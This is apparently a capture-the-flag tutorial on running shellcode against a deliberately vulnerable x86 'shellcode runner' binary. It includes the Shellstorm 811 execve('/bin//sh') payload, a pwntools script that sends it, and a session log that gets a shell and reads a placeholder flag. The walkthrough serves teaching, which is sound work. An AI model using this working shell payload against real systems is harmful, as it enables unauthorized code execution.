This challenge offers you to write some shellcode and it'll execute it for you. It's an x86 executable with minimal permissions:
$ checksec ./chall
[*] '/ironforge/chall'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No
We'l discuss writing shellcode later. For now, we'll use Shellstorm to get shellcode for ourselves. Since we want a shell on x86, we can use Shellstorm 811 for the job.
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73" "\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x89\xc1\x89\xc2\xb0\x0b" "\xcd\x80\x31\xc0\x40\xcd\x80";
We can pretty easily format this to Python (or even Bash):
sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
We can then send this using Pwntools:
from pwn import * elf = context.binary = ELF("./chall") p = process() sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" p.sendline(sc) p.interactive()
Running this script gives us:
$ python3 asd.py
[*] '/ironforge/chall'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No
[+] Starting local process '/ironforge/chall': pid 140651
[*] Switching to interactive mode
Give me some some code! I'll execute it for you.
>
Thank you!
$ ls
asd.py chall flag.txt
$ cat flag.txt
IFC{PL4C3H0LD3R_FL4G_H3R3!}
$ exit
[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code 0 (pid 140651)
[*] Got EOF while sending in interactive